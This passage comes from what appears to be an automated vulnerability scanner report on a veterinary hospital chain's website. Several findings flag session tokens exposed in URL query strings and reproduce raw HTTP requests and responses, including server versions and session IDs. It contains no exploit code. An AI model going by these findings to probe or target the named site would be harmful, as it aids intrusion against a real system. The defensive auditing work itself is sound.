=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fh
anson%25252fappt.html%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d
Request
GET /hanson/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205 
&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submit
%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:51:48 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=v2putd7q3251oms7i32uuk9as6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 24905 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]...
4.2. http://www.vcahospitals.com/hanson/offer.html
Summary
Severity: Medium
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /hanson/offer.html
Issue detail
The URL in the request appears to contain a session token within the query string:http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252
f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip=
Request
GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde &uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526t
oken%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:51:40 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=j1fqeocn1q0uhv2hk1geg4cm22; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19335 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]...
4.3. http://www.vcahospitals.com/main/offer
Summary
Severity: Medium
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The URL in the request appears to contain a session token within the query string:http://www.vcahospitals.com/main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=B5F701EB-EA95-422D-924E-BCD921689D1E&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=595ca47f74a6874c96fd2cb4b94d5da9&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d2505B0C6-B6AA-4144-878F-54873D353284%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d917e022cccb7f727295d2ccceeb0579c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=
Request
GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=B5F701EB-EA95-422D-924E-BCD921689D1E&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=595ca47f74a6874c96fd2cb4b94d5da9 &tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d2505B0C6-B6AA-4144-878F-54873D353284%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d917e022cccb7f727295d2ccceeb0579c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:14:42 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 16337 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]...
4.4. http://www.vcahospitals.com/main/offer/
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://www.vcahospitals.com
Path:
/main/offer/
Issue detail
The URL in the request (reproduced in full under Request below) appears to contain a session token within the query string.
Request
GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A6830C2B-D8F4-43F2-B95E-78C277FCCFF2&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d8EFFB05E-C91A-43DB-BA1B-A7BB745D0BB7%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d040e6353a7ea37e6930856fe2e96ffd3%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=a7e84c5a5824b2f3bfa388c2289ad10b 
&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d61B79C48-C062-46F9-ABB6-C9F2C04EB7C7%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d577d155ccfdadada67e9689c8e906f7c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253d8EFFB05E-C91A-43DB-BA1B-A7BB745D0BB7%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253d040e6353a7ea37e6930856fe2e96ffd3%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: 
www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:13:48 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=9fa7nr5r6l675dmq1d4gnmpmh2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19716 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]...
4.5. http://www.vcahospitals.com/main/offer/thank-you.html
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://www.vcahospitals.com
Path:
/main/offer/thank-you.html
Issue detail
The URL in the request (reproduced in full under Request below) appears to contain a session token within the query string.
Request
POST /main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=89CA6527-34F5-44F5-9FE6-1408D41DED87&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=0a9f236de16091436621ac3ecb3014ab &tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC5E58271-0599-4DCE-A64E-4093BAC4AD11%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d3f9b848b2f0d1b6547ef64f5b4be7af5%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253d552C3BF2-B50A-4487-9212-B5A1CFEBF63B%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de47593670de12e47b4fa1e9df57adad6%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d79086EA1-6374-4E83-A33A-DCBB6D3E16CA%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253db15cfbc2e8b9d5050f6de59c6ed8b5b1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252fo
ffer%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com Pragma: no-cache Content-Length: 3685 fname=&lname=&addr=&city=&state=AZ&zip=&phone=&email=&optin=on&pettype=&other=&petname=&petage=&variant=&token=31c82c3543a452dc1200540d59f0157f&guid=0AD96EEC-57E3-4BB0-B188-1922AB63F2B0&referer=&uri=h...[SNIP]...
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:10:55 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=mu2hdob1gobie78vsadtqvdr76; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 3161 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]...
4.6. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://www.vcahospitals.com
Path:
/new-york-veterinary-hospital/appt.html
Issue detail
